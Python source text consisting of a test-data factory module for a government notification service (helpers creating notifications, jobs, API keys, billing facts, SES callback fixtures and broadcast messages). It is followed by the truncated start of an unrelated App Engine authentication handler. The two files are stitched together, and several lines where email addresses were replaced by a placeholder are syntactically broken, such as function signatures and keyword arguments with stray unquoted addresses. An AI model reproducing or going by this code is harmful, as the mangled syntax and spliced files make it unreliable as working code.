create_api_key(template.service, key_type=key_type)\n\n if template.template_type == \'letter\' and postage is None:\n postage = \'second\'\n\n data = {\n \'id\': uuid.uuid4(),\n \'to\': to_field,\n \'job_id\': job and job.id,\n \'job\': job,\n \'service_id\': template.service.id,\n \'service\': template.service,\n \'template_id\': template.id,\n \'template_version\': template.version,\n \'status\': status,\n \'reference\': reference,\n \'created_at\': created_at,\n \'sent_at\': sent_at,\n \'billable_units\': billable_units,\n \'personalisation\': personalisation,\n \'notification_type\': template.template_type,\n \'api_key\': api_key,\n \'api_key_id\': api_key and api_key.id,\n \'key_type\': api_key.key_type if api_key else key_type,\n \'sent_by\': sent_by,\n \'updated_at\': updated_at,\n \'client_reference\': client_reference,\n \'job_row_number\': job_row_number,\n \'rate_multiplier\': rate_multiplier,\n \'international\': international,\n \'phone_prefix\': phone_prefix,\n \'normalised_to\': normalised_to,\n \'reply_to_text\': reply_to_text,\n \'created_by_id\': created_by_id,\n \'postage\': postage,\n \'document_download_count\': document_download_count,\n }\n notification = Notification(**data)\n 
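These create_* helpers form a factory layer for tests: every column gets a sensible default, and a call overrides only what the test cares about. A sketch of typical composition, assuming a pytest database fixture (here called notify_db_session, a name not defined in this file) supplies the app and session context:

def test_notification_defaults(notify_db_session):  # fixture name is an assumption
    service = create_service(service_name="unit test service")
    template = create_template(service, template_type=SMS_TYPE)
    notification = create_notification(template=template, status="created")
    assert notification.notification_type == SMS_TYPE
    assert notification.billable_units == 1   # factory default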
dao_create_notification(notification)\n\n return notification\n\n\ndef create_notification_history(\n template=None,\n job=None,\n job_row_number=None,\n status=\'created\',\n reference=None,\n created_at=None,\n sent_at=None,\n updated_at=None,\n billable_units=1,\n api_key=None,\n key_type=KEY_TYPE_NORMAL,\n sent_by=None,\n client_reference=None,\n rate_multiplier=None,\n international=False,\n phone_prefix=None,\n created_by_id=None,\n postage=None,\n id=None\n):\n assert job or template\n if job:\n template = job.template\n\n if created_at is None:\n created_at = datetime.utcnow()\n\n if status != \'created\':\n sent_at = sent_at or datetime.utcnow()\n updated_at = updated_at or datetime.utcnow()\n\n if template.template_type == \'letter\' and postage is None:\n postage = \'second\'\n\n data = {\n \'id\': id or uuid.uuid4(),\n \'job_id\': job and job.id,\n \'job\': job,\n \'service_id\': template.service.id,\n \'service\': template.service,\n \'template_id\': template.id,\n \'template_version\': template.version,\n \'status\': status,\n \'reference\': reference,\n \'created_at\': created_at,\n \'sent_at\': sent_at,\n \'billable_units\': billable_units,\n \'notification_type\': template.template_type,\n \'api_key\': api_key,\n \'api_key_id\': api_key and api_key.id,\n \'key_type\': api_key.key_type if api_key else key_type,\n \'sent_by\': sent_by,\n \'updated_at\': updated_at,\n \'client_reference\': client_reference,\n \'job_row_number\': job_row_number,\n \'rate_multiplier\': rate_multiplier,\n \'international\': international,\n \'phone_prefix\': phone_prefix,\n \'created_by_id\': created_by_id,\n \'postage\': postage\n }\n notification_history = NotificationHistory(**data)\n db.session.add(notification_history)\n db.session.commit()\n\n return notification_history\n\n\ndef create_job(\n template,\n notification_count=1,\n created_at=None,\n job_status=\'pending\',\n scheduled_for=None,\n processing_started=None,\n processing_finished=None,\n original_file_name=\'some.csv\',\n archived=False,\n contact_list_id=None,\n):\n data = {\n \'id\': uuid.uuid4(),\n \'service_id\': template.service_id,\n \'service\': template.service,\n \'template_id\': template.id,\n \'template_version\': template.version,\n \'original_file_name\': original_file_name,\n \'notification_count\': notification_count,\n \'created_at\': created_at or datetime.utcnow(),\n \'created_by\': template.created_by,\n \'job_status\': job_status,\n \'scheduled_for\': scheduled_for,\n \'processing_started\': processing_started,\n \'processing_finished\': processing_finished,\n \'archived\': archived,\n \'contact_list_id\': contact_list_id,\n }\n job = Job(**data)\n dao_create_job(job)\n return job\n\n\ndef create_service_permission(service_id, permission=EMAIL_TYPE):\n dao_add_service_permission(\n service_id if service_id else create_service().id, permission)\n\n service_permissions = ServicePermission.query.all()\n\n return service_permissions\n\n\ndef create_inbound_sms(\n service,\n notify_number=None,\n user_number=\'447700900111\',\n provider_date=None,\n provider_reference=None,\n content=\'Hello\',\n provider=""mmg"",\n created_at=None\n):\n if not service.inbound_number:\n create_inbound_number(\n # create random inbound number\n notify_number or \'07{:09}\'.format(random.randint(0, 1e9 - 1)),\n provider=provider,\n service_id=service.id\n )\n\n inbound = InboundSms(\n service=service,\n created_at=created_at or datetime.utcnow(),\n notify_number=service.get_inbound_number(),\n user_number=user_number,\n 
provider_date=provider_date or datetime.utcnow(),\n provider_reference=provider_reference or \'foo\',\n content=content,\n provider=provider\n )\n dao_create_inbound_sms(inbound)\n return inbound\n\n\ndef create_service_inbound_api(\n service,\n url=""https://something.com"",\n bearer_token=""some_super_secret"",\n):\n service_inbound_api = ServiceInboundApi(service_id=service.id,\n url=url,\n bearer_token=bearer_token,\n updated_by_id=service.users[0].id\n )\n save_service_inbound_api(service_inbound_api)\n return service_inbound_api\n\n\ndef create_service_callback_api(\n service,\n url=""https://something.com"",\n bearer_token=""some_super_secret"",\n callback_type=""delivery_status""\n):\n service_callback_api = ServiceCallbackApi(service_id=service.id,\n url=url,\n bearer_token=bearer_token,\n updated_by_id=service.users[0].id,\n callback_type=callback_type\n )\n save_service_callback_api(service_callback_api)\n return service_callback_api\n\n\ndef create_email_branding(colour=\'blue\', logo=\'test_x2.png\', name=\'test_org_1\', text=\'DisplayName\'):\n data = {\n \'colour\': colour,\n \'logo\': logo,\n \'name\': name,\n \'text\': text,\n }\n email_branding = EmailBranding(**data)\n dao_create_email_branding(email_branding)\n\n return email_branding\n\n\ndef create_rate(start_date, value, notification_type):\n rate = Rate(\n id=uuid.uuid4(),\n valid_from=start_date,\n rate=value,\n notification_type=notification_type\n )\n db.session.add(rate)\n db.session.commit()\n return rate\n\n\ndef create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class=\'second\'):\n if start_date is None:\n start_date = datetime(2016, 1, 1)\n rate = LetterRate(\n id=uuid.uuid4(),\n start_date=start_date,\n end_date=end_date,\n crown=crown,\n sheet_count=sheet_count,\n rate=rate,\n post_class=post_class\n )\n db.session.add(rate)\n db.session.commit()\n return rate\n\n\ndef create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None):\n id_ = uuid.uuid4()\n\n name = key_name if key_name else \'{} api key {}\'.format(key_type, id_)\n\n api_key = ApiKey(\n service=service,\n name=name,\n created_by=service.created_by,\n key_type=key_type,\n id=id_,\n secret=uuid.uuid4()\n )\n db.session.add(api_key)\n db.session.commit()\n return api_key\n\n\ndef create_inbound_number(number, provider=\'mmg\', active=True, service_id=None):\n inbound_number = InboundNumber(\n id=uuid.uuid4(),\n number=number,\n provider=provider,\n active=active,\n service_id=service_id\n )\n db.session.add(inbound_number)\n db.session.commit()\n return inbound_number\n\n\ndef create_reply_to_email(\n service,\n email_address,\n is_default=True,\n archived=False\n):\n data = {\n \'service\': service,\n \'email_address\': email_address,\n \'is_default\': is_default,\n \'archived\': archived,\n }\n reply_to = ServiceEmailReplyTo(**data)\n\n db.session.add(reply_to)\n db.session.commit()\n\n return reply_to\n\n\ndef create_service_sms_sender(\n service,\n sms_sender,\n is_default=True,\n inbound_number_id=None,\n archived=False\n):\n data = {\n \'service_id\': service.id,\n \'sms_sender\': sms_sender,\n \'is_default\': is_default,\n \'inbound_number_id\': inbound_number_id,\n \'archived\': archived,\n }\n service_sms_sender = ServiceSmsSender(**data)\n\n db.session.add(service_sms_sender)\n db.session.commit()\n\n return service_sms_sender\n\n\ndef create_letter_contact(\n service,\n contact_block,\n is_default=True,\n archived=False\n):\n data = {\n \'service\': service,\n \'contact_block\': 
contact_block,\n \'is_default\': is_default,\n \'archived\': archived,\n }\n letter_content = ServiceLetterContact(**data)\n\n db.session.add(letter_content)\n db.session.commit()\n\n return letter_content\n\n\ndef create_annual_billing(\n service_id, free_sms_fragment_limit, financial_year_start\n):\n annual_billing = AnnualBilling(\n service_id=service_id,\n free_sms_fragment_limit=free_sms_fragment_limit,\n financial_year_start=financial_year_start\n )\n db.session.add(annual_billing)\n db.session.commit()\n\n return annual_billing\n\n\ndef create_domain(domain, organisation_id):\n\n domain = Domain(domain=domain, organisation_id=organisation_id)\n\n db.session.add(domain)\n db.session.commit()\n\n return domain\n\n\ndef create_organisation(\n name=\'test_org_1\',\n active=True,\n organisation_type=None,\n domains=None,\n organisation_id=None,\n purchase_order_number=None,\n billing_contact_names=None,\n billing_contact_email_addresses=None,\n billing_reference=None,\n):\n data = {\n \'id\': organisation_id,\n \'name\': name,\n \'active\': active,\n \'organisation_type\': organisation_type,\n \'purchase_order_number\': purchase_order_number,\n \'billing_contact_names\': billing_contact_names,\n \'billing_contact_email_addresses\': billing_contact_email_addresses,\n \'billing_reference\': billing_reference,\n }\n organisation = Organisation(**data)\n dao_create_organisation(organisation)\n\n for domain in domains or []:\n create_domain(domain, organisation.id)\n\n return organisation\n\n\ndef create_invited_org_user(organisation, invited_by, dummy@email.com\'):\n invited_org_user = InvitedOrganisationUser(\n email_address=email_address,\n invited_by=invited_by,\n organisation=organisation,\n )\n save_invited_org_user(invited_org_user)\n return invited_org_user\n\n\ndef create_daily_sorted_letter(billing_day=None,\n file_name=""Notify-20180118123.rs.txt"",\n unsorted_count=0,\n sorted_count=0):\n daily_sorted_letter = DailySortedLetter(\n billing_day=billing_day or date(2018, 1, 18),\n file_name=file_name,\n unsorted_count=unsorted_count,\n sorted_count=sorted_count\n )\n\n db.session.add(daily_sorted_letter)\n db.session.commit()\n\n return daily_sorted_letter\n\n\ndef create_ft_billing(bst_date,\n template,\n *,\n provider=\'test\',\n rate_multiplier=1,\n international=False,\n rate=0,\n billable_unit=1,\n notifications_sent=1,\n postage=\'none\'\n ):\n data = FactBilling(bst_date=bst_date,\n service_id=template.service_id,\n template_id=template.id,\n notification_type=template.template_type,\n provider=provider,\n rate_multiplier=rate_multiplier,\n international=international,\n rate=rate,\n billable_units=billable_unit,\n notifications_sent=notifications_sent,\n postage=postage)\n db.session.add(data)\n db.session.commit()\n return data\n\n\ndef create_ft_notification_status(\n bst_date,\n notification_type=\'sms\',\n service=None,\n template=None,\n job=None,\n key_type=\'normal\',\n notification_status=\'delivered\',\n count=1\n):\n if job:\n template = job.template\n if template:\n service = template.service\n notification_type = template.template_type\n else:\n if not service:\n service = create_service()\n template = create_template(service=service, template_type=notification_type)\n\n data = FactNotificationStatus(\n bst_date=bst_date,\n template_id=template.id,\n service_id=service.id,\n job_id=job.id if job else uuid.UUID(int=0),\n notification_type=notification_type,\n key_type=key_type,\n notification_status=notification_status,\n notification_count=count\n )\n 
db.session.add(data)\n db.session.commit()\n return data\n\n\ndef create_process_time(bst_date=\'2021-03-01\', messages_total=35, messages_within_10_secs=34):\n data = FactProcessingTime(\n bst_date=bst_date,\n messages_total=messages_total,\n messages_within_10_secs=messages_within_10_secs\n )\n fact_processing_time_dao.insert_update_processing_time(data)\n\n\ndef create_service_guest_list(service, email_address=None, mobile_number=None):\n if email_address:\n guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, email_address)\n elif mobile_number:\n guest_list_user = ServiceGuestList.from_string(service.id, MOBILE_TYPE, mobile_number)\n else:\n guest_list_user = ServiceGuestList.from_string(service.id, EMAIL_TYPE, dummy@email.com\')\n\n db.session.add(guest_list_user)\n db.session.commit()\n return guest_list_user\n\n\ndef create_complaint(service=None,\n notification=None,\n created_at=None):\n if not service:\n service = create_service()\n if not notification:\n template = create_template(service=service, template_type=\'email\')\n notification = create_notification(template=template)\n\n complaint = Complaint(notification_id=notification.id,\n service_id=service.id,\n ses_feedback_id=str(uuid.uuid4()),\n complaint_type=\'abuse\',\n complaint_date=datetime.utcnow(),\n created_at=created_at if created_at else datetime.now()\n )\n db.session.add(complaint)\n db.session.commit()\n return complaint\n\n\ndef ses_complaint_callback_malformed_message_id():\n return {\n \'Signature\': \'bb\',\n \'SignatureVersion\': \'1\', \'MessageAttributes\': {}, \'MessageId\': \'PI:KEY\',\n \'UnsubscribeUrl\': \'https://sns.eu-west-1.amazonaws.com\',\n \'TopicArn\': \'arn:ses_notifications\', \'Type\': \'Notification\',\n \'Timestamp\': \'2018-06-05T14:00:15.952Z\', \'Subject\': None,\n \'Message\': \'{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\\\""Some Service\\\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""badMessageId"":""ref1"",""destination"":[dummy@email.com""]}}\', # noqa\n \'SigningCertUrl\': \'https://sns.pem\'\n }\n\n\ndef ses_complaint_callback_with_missing_complaint_type():\n """"""\n https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object\n """"""\n return {\n \'Signature\': \'bb\',\n \'SignatureVersion\': \'1\', \'MessageAttributes\': {}, \'MessageId\': \'PI:KEY\',\n \'UnsubscribeUrl\': \'https://sns.eu-west-1.amazonaws.com\',\n \'TopicArn\': \'arn:ses_notifications\', \'Type\': \'Notification\',\n \'Timestamp\': \'2018-06-05T14:00:15.952Z\', \'Subject\': None,\n \'Message\': \'{""notificationType"":""Complaint"",""complaint"":{""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\\\""Some Service\\\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}\', # noqa\n \'SigningCertUrl\': \'https://sns.pem\'\n }\n\n\ndef ses_complaint_callback():\n """"""\n 
https://docs.aws.amazon.com/ses/latest/DeveloperGuide/notification-contents.html#complaint-object\n """"""\n return {\n \'Signature\': \'bb\',\n \'SignatureVersion\': \'1\', \'MessageAttributes\': {}, \'MessageId\': \'PI:KEY\',\n \'UnsubscribeUrl\': \'https://sns.eu-west-1.amazonaws.com\',\n \'TopicArn\': \'arn:ses_notifications\', \'Type\': \'Notification\',\n \'Timestamp\': \'2018-06-05T14:00:15.952Z\', \'Subject\': None,\n \'Message\': \'{""notificationType"":""Complaint"",""complaint"":{""complaintFeedbackType"": ""abuse"", ""complainedRecipients"":[{""emailAddress"":dummy@email.com""}],""timestamp"":""2018-06-05T13:59:58.000Z"",""feedbackId"":""ses_feedback_id""},""mail"":{""timestamp"":""2018-06-05T14:00:15.950Z"",""source"":""\\\\""Some Service\\\\"" "",""sourceArn"":""arn:identity/notifications.service.gov.uk"",""sourceIp"":""127.0.0.1"",""sendingAccountId"":""888450439860"",""messageId"":""ref1"",""destination"":[dummy@email.com""]}}\', # noqa\n \'SigningCertUrl\': \'https://sns.pem\'\n }\n\n\ndef ses_notification_callback():\n return \'{\\n ""Type"" : ""Notification"",\\n ""MessageId"" : ""ref1"",\' \\\n \'\\n ""TopicArn"" : ""arn:aws:sns:eu-west-1:123456789012:testing"",\' \\\n \'\\n ""Message"" : ""{\\\\""notificationType\\\\"":\\\\""Delivery\\\\"",\' \\\n \'\\\\""mail\\\\"":{\\\\""timestamp\\\\"":\\\\""2016-03-14T12:35:25.909Z\\\\"",\' \\\n \'\\\\""source\\\\"":dummy@email.com"",\' \\\n \'\\\\""sourceArn\\\\"":\\\\""arn:aws:ses:eu-west-1:123456789012:identity/testing-notify\\\\"",\' \\\n \'\\\\""sendingAccountId\\\\"":\\\\""123456789012\\\\"",\' \\\n \'\\\\""messageId\\\\"":\\\\""ref1\\\\"",\' \\\n \'\\\\""destination\\\\"":dummy@email.com""]},\' \\\n \'\\\\""delivery\\\\"":{\\\\""timestamp\\\\"":\\\\""2016-03-14T12:35:26.567Z\\\\"",\' \\\n \'\\\\""processingTimeMillis\\\\"":658,\' \\\n \'\\\\""recipients\\\\"":dummy@email.com""],\' \\\n \'\\\\""smtpResponse\\\\"":\\\\""250 2.0.0 OK 1457958926 uo5si26480932wjc.221 - gsmtp\\\\"",\' \\\n \'\\\\""reportingMTA\\\\"":\\\\""a6-238.smtp-out.eu-west-1.amazonses.com\\\\""}}"",\' \\\n \'\\n ""Timestamp"" : ""2016-03-14T12:35:26.665Z"",\\n ""SignatureVersion"" : ""1"",\' \\\n \'\\n ""Signature"" : ""X8d7eTAOZ6wlnrdVVPYanrAlsX0SMPfOzhoTEBnQqYkrNWTqQY91C0f3bxtPdUhUt\' \\\n \'PI:KEY\' \\\n \'PI:KEY\' \\\n \'PI:KEY"",\' \\\n \'\\n ""SigningCertURL"" : ""https://sns.eu-west-1.amazonaws.com/SimpleNotificationService-bb750\' \\\n \'dd426d95ee9390147a5624348ee.pem"",\' \\\n \'\\n ""UnsubscribeURL"" : ""https://sns.eu-west-1.amazonaws.com/?Action=Unsubscribe&S\' \\\n \'PI:KEY""\\n}\'\n\n\ndef create_service_data_retention(\n service,\n notification_type=\'sms\',\n days_of_retention=3\n):\n data_retention = insert_service_data_retention(\n service_id=service.id,\n notification_type=notification_type,\n days_of_retention=days_of_retention\n )\n return data_retention\n\n\ndef create_invited_user(service=None,\n to_email_address=None):\n\n if service is None:\n service = create_service()\n if to_email_address is None:\n to_email_address = dummy@email.com\'\n\n from_user = service.users[0]\n\n data = {\n \'service\': service,\n \'email_address\': to_email_address,\n \'from_user\': from_user,\n \'permissions\': \'send_messages,manage_service,manage_api_keys\',\n \'folder_permissions\': [str(uuid.uuid4()), str(uuid.uuid4())]\n }\n invited_user = InvitedUser(**data)\n save_invited_user(invited_user)\n return invited_user\n\n\ndef create_template_folder(service, name=\'foo\', parent=None):\n tf = TemplateFolder(name=name, service=service, parent=parent)\n 
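Note the shape of the ses_*_callback fixtures above: the outer dict mimics an SNS notification, and its 'Message' value is itself a JSON document serialized to a string, so consumers must decode twice. A sketch of that double decode; it assumes the un-redacted fixture, since the scrubbed email addresses in the copies above would no longer parse as valid JSON:

import json

envelope = ses_complaint_callback()        # outer SNS notification (a dict)
inner = json.loads(envelope["Message"])    # inner SES payload, JSON-in-a-string
assert inner["notificationType"] == "Complaint"
print(inner["complaint"]["complaintFeedbackType"])   # 'abuse'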
db.session.add(tf)\n db.session.commit()\n return tf\n\n\ndef create_letter_branding(name=\'HM Government\', filename=\'hm-government\'):\n test_domain_branding = LetterBranding(name=name,\n filename=filename,\n )\n db.session.add(test_domain_branding)\n db.session.commit()\n return test_domain_branding\n\n\ndef set_up_usage_data(start_date):\n year = int(start_date.strftime(\'%Y\'))\n one_week_earlier = start_date - timedelta(days=7)\n two_days_later = start_date + timedelta(days=2)\n one_week_later = start_date + timedelta(days=7)\n one_month_later = start_date + timedelta(days=31)\n\n # service with sms and letters:\n service_1_sms_and_letter = create_service(\n service_name=\'a - with sms and letter\',\n purchase_order_number=""service purchase order number"",\n billing_contact_names=""service billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""service billing reference""\n )\n letter_template_1 = create_template(service=service_1_sms_and_letter, template_type=\'letter\')\n sms_template_1 = create_template(service=service_1_sms_and_letter, template_type=\'sms\')\n create_annual_billing(\n service_id=service_1_sms_and_letter.id, free_sms_fragment_limit=10, financial_year_start=year\n )\n org_1 = create_organisation(\n name=""Org for {}"".format(service_1_sms_and_letter.name),\n purchase_order_number=""org1 purchase order number"",\n billing_contact_names=""org1 billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""org1 billing reference""\n )\n dao_add_service_to_organisation(\n service=service_1_sms_and_letter,\n organisation_id=org_1.id\n )\n\n create_ft_billing(bst_date=one_week_earlier, template=sms_template_1, billable_unit=2, rate=0.11)\n create_ft_billing(bst_date=start_date, template=sms_template_1, billable_unit=2, rate=0.11)\n create_ft_billing(bst_date=two_days_later, template=sms_template_1, billable_unit=1, rate=0.11)\n\n create_ft_billing(bst_date=one_week_later, template=letter_template_1,\n notifications_sent=2, billable_unit=1, rate=.35, postage=\'first\')\n create_ft_billing(bst_date=one_month_later, template=letter_template_1,\n notifications_sent=4, billable_unit=2, rate=.45, postage=\'second\')\n create_ft_billing(bst_date=one_week_later, template=letter_template_1,\n notifications_sent=2, billable_unit=2, rate=.45, postage=\'second\')\n\n # service with emails only:\n service_with_emails = create_service(service_name=\'b - emails\')\n email_template = create_template(service=service_with_emails, template_type=\'email\')\n org_2 = create_organisation(\n name=\'Org for {}\'.format(service_with_emails.name),\n )\n dao_add_service_to_organisation(service=service_with_emails, organisation_id=org_2.id)\n\n create_ft_billing(bst_date=start_date, template=email_template, notifications_sent=10)\n\n # service with letters:\n service_with_letters = create_service(service_name=\'c - letters only\')\n letter_template_3 = create_template(service=service_with_letters, template_type=\'letter\')\n org_for_service_with_letters = create_organisation(\n name=""Org for {}"".format(service_with_letters.name),\n purchase_order_number=""org3 purchase order number"",\n billing_contact_names=""org3 billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""org3 billing reference""\n )\n dao_add_service_to_organisation(service=service_with_letters, organisation_id=org_for_service_with_letters.id)\n\n create_ft_billing(bst_date=start_date, template=letter_template_3,\n notifications_sent=2, billable_unit=3, 
rate=.50, postage=\'first\')\n create_ft_billing(bst_date=one_week_later, template=letter_template_3,\n notifications_sent=8, billable_unit=5, rate=.65, postage=\'second\')\n create_ft_billing(bst_date=one_month_later, template=letter_template_3,\n notifications_sent=12, billable_unit=5, rate=.65, postage=\'second\')\n\n # service with letters, without an organisation:\n service_with_letters_without_org = create_service(service_name=\'d - service without org\')\n letter_template_4 = create_template(service=service_with_letters_without_org, template_type=\'letter\')\n\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=7, billable_unit=4, rate=1.55, postage=\'rest-of-world\')\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=8, billable_unit=4, rate=1.55, postage=\'europe\')\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=2, billable_unit=1, rate=.35, postage=\'second\')\n create_ft_billing(bst_date=two_days_later, template=letter_template_4,\n notifications_sent=1, billable_unit=1, rate=.50, postage=\'first\')\n\n # service with chargeable SMS, without an organisation\n service_with_sms_without_org = create_service(\n service_name=\'b - chargeable sms\',\n purchase_order_number=""sms purchase order number"",\n billing_contact_names=""sms billing contact names"",\n dummy@email.com dummy@email.com"",\n billing_reference=""sms billing reference""\n )\n sms_template = create_template(service=service_with_sms_without_org, template_type=\'sms\')\n create_annual_billing(\n service_id=service_with_sms_without_org.id, free_sms_fragment_limit=10, financial_year_start=year\n )\n create_ft_billing(bst_date=one_week_earlier, template=sms_template, rate=0.11, billable_unit=12)\n create_ft_billing(bst_date=two_days_later, template=sms_template, rate=0.11)\n create_ft_billing(bst_date=one_week_later, template=sms_template, billable_unit=2, rate=0.11)\n\n # service with SMS within free allowance\n service_with_sms_within_allowance = create_service(\n service_name=\'e - sms within allowance\'\n )\n sms_template_2 = create_template(service=service_with_sms_within_allowance, template_type=\'sms\')\n create_annual_billing(\n service_id=service_with_sms_within_allowance.id, free_sms_fragment_limit=10, financial_year_start=year\n )\n create_ft_billing(bst_date=one_week_later, template=sms_template_2, billable_unit=2, rate=0.11)\n\n # dictionary with services and orgs to return\n return {\n ""org_1"": org_1,\n ""service_1_sms_and_letter"": service_1_sms_and_letter,\n ""org_2"": org_2,\n ""service_with_emails"": service_with_emails,\n ""org_for_service_with_letters"": org_for_service_with_letters,\n ""service_with_letters"": service_with_letters,\n ""service_with_letters_without_org"": service_with_letters_without_org,\n ""service_with_sms_without_org"": service_with_sms_without_org,\n ""service_with_sms_within_allowance"": service_with_sms_within_allowance,\n }\n\n\ndef create_returned_letter(service=None, reported_at=None, notification_id=None):\n if not service:\n service = create_service(service_name=\'a - with sms and letter\')\n returned_letter = ReturnedLetter(\n service_id=service.id,\n reported_at=reported_at or datetime.utcnow(),\n notification_id=notification_id or uuid.uuid4(),\n created_at=datetime.utcnow(),\n )\n\n db.session.add(returned_letter)\n db.session.commit()\n return returned_letter\n\n\ndef create_service_contact_list(\n service=None,\n 
original_file_name=\'EmergencyContactList.xls\',\n row_count=100,\n template_type=\'email\',\n created_by_id=None,\n archived=False,\n):\n if not service:\n service = create_service(service_name=\'service for contact list\', user=create_user())\n\n contact_list = ServiceContactList(\n service_id=service.id,\n original_file_name=original_file_name,\n row_count=row_count,\n template_type=template_type,\n created_by_id=created_by_id or service.users[0].id,\n created_at=datetime.utcnow(),\n archived=archived,\n )\n db.session.add(contact_list)\n db.session.commit()\n return contact_list\n\n\ndef create_broadcast_message(\n template=None,\n *,\n service=None, # only used if template is not provided\n created_by=None,\n personalisation=None,\n content=None,\n status=BroadcastStatusType.DRAFT,\n starts_at=None,\n finishes_at=None,\n areas=None,\n stubbed=False\n):\n if template:\n service = template.service\n template_id = template.id\n template_version = template.version\n personalisation = personalisation or {}\n content = template._as_utils_template_with_personalisation(\n personalisation\n ).content_with_placeholders_filled_in\n elif content:\n template_id = None\n template_version = None\n personalisation = None\n content = content\n else:\n pytest.fail(\'Provide template or content\')\n\n broadcast_message = BroadcastMessage(\n service_id=service.id,\n template_id=template_id,\n template_version=template_version,\n personalisation=personalisation,\n status=status,\n starts_at=starts_at,\n finishes_at=finishes_at,\n created_by_id=created_by.id if created_by else service.created_by_id,\n areas=areas or {\'areas\': [], \'simple_polygons\': []},\n content=content,\n stubbed=stubbed\n )\n db.session.add(broadcast_message)\n db.session.commit()\n return broadcast_message\n\n\ndef create_broadcast_event(\n broadcast_message,\n sent_at=None,\n message_type=\'alert\',\n transmitted_content=None,\n transmitted_areas=None,\n transmitted_sender=None,\n transmitted_starts_at=None,\n transmitted_finishes_at=None,\n):\n b_e = BroadcastEvent(\n service=broadcast_message.service,\n broadcast_message=broadcast_message,\n sent_at=sent_at or datetime.utcnow(),\n message_type=message_type,\n transmitted_content=transmitted_content or {\'body\': \'this is an emergency broadcast message\'},\n transmitted_areas=transmitted_areas or broadcast_message.areas,\n transmitted_sender=transmitted_sender or \'www.notifications.service.gov.uk\',\n transmitted_starts_at=transmitted_starts_at,\n transmitted_finishes_at=transmitted_finishes_at or datetime.utcnow() + timedelta(hours=24),\n )\n db.session.add(b_e)\n db.session.commit()\n return b_e\n\n\ndef create_broadcast_provider_message(\n broadcast_event,\n provider,\n status=\'sending\'\n):\n broadcast_provider_message_id = uuid.uuid4()\n provider_message = BroadcastProviderMessage(\n id=broadcast_provider_message_id,\n broadcast_event=broadcast_event,\n provider=provider,\n status=status,\n )\n db.session.add(provider_message)\n db.session.commit()\n\n provider_message_number = None\n if provider == BroadcastProvider.VODAFONE:\n provider_message_number = BroadcastProviderMessageNumber(\n broadcast_provider_message_id=broadcast_provider_message_id)\n db.session.add(provider_message_number)\n db.session.commit()\n return provider_message\n\n\ndef create_webauthn_credential(\n user,\n name=\'my key\',\n *,\n credential_data=\'ABC123\',\n registration_response=\'DEF456\',\n):\n webauthn_credential = WebauthnCredential(\n user=user,\n name=name,\n 
credential_data=credential_data,\n registration_response=registration_response\n )\n\n db.session.add(webauthn_credential)\n db.session.commit()\n return webauthn_credential\n', '# -*- coding: utf-8 -*-\n\n\nimport os\nimport uuid\nimport datetime\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import users\nfrom google.appengine.ext import db\nfrom google.appengine.api import mail\nfrom google.appengine.ext.webapp import template\n\nfrom django.utils import simplejson as json\nfrom google.appengine.api import urlfetch\nimport urllib\n\nimport conf\nimport app.FlyingClub\nimport app.CoreHandler\nfrom app.models import Comment, Crew\n\n\n\n\nclass AuthHandler(webapp.RequestHandler):\n\n\n\t###################################################################################################\n\t## Get Actions\n\t###################################################################################################\n\tdef get(self, section=None, page=None):\n\t\n\t\t#sessID = self.do_cookie_check()\n\t\tsection = \'auth\'\n\t\ttemplate_vars = {}\n\t\tApp = app.FlyingClub.FlyingClub(section, page)\n\t\ttemplate_vars[\'app\'] = App\n\t\t\n\t\t#tvars[\'appo\'] = Appo\n\t\t#tvars[\'conf\'] = conf\n\t\t#tvars[\'user\'] = None\n\t\t#template_vars[\'crewID\'] = crewID\n\t\t#f \'sessIdent\' in self.request.cookies:\n\t\t#sessIdent = self.request.cookies[\'sessIdent\'] \n\t\t#lse:\n\t\t#\tsessIdent = None\n\n\t\t## Setup Section and Page\n\t\t#if section == None:\n\t\t\t#section = ""index""\n\t\t#template_vars[\'section\'] = section\n\t\t#template_vars[\'page\'] = page\n\t\t\n\n\t\t## Get Comments\n\t\tq = db.GqlQuery(""SELECT * FROM Comment "" +\n\t\t\t\t\t\t""WHERE section = :1 "" +\n\t\t\t\t\t\t""ORDER BY dated DESC"",\n\t\t\t\t\t\tsection)\n\t\tresults = q.fetch(50)\n\t\t#template_vars[\'comments\'] = results\n\n\t\t## Application Object\n\n\t\t#template_vars[\'page_title\'] = Appo.title(""/%s/"" % section)\n\n\n\t\t## Setup User + Aauth\n\t\t#user = users.get_current_user()\n\t\t#if not user:\n\t\t#\ttemplate_vars[\'user\'] = None\n\t\t#\ttemplate_vars[\'login_url\'] = users.create_login_url(""/set_session/"")\t\t\n\t\t#else:\n\t\t#\ttemplate_vars[\'user\'] = user\n\t\t#\ttemplate_vars[\'logout_url\'] = users.create_logout_url(""/subscribe/"")\n\n\t\n\t\t## Sign In Section\n\t\t#if section == \'ssignin\' :\n\t\t#\tif sessID:\n\t\t#\t\tself.redirect(""/profile/"")\n\t\t#\t\treturn \n\t\t\t#template_vars[\'page_title\'] = \'Sign In with OpenId\'\n\n\t\t#if section == \'sdo_logout\':\n\t\t#\t\tcook_str = \'sessID=%s; expires=Fri, 31-Dec-1980 23:59:59 GMT; Path=/;\'\t% 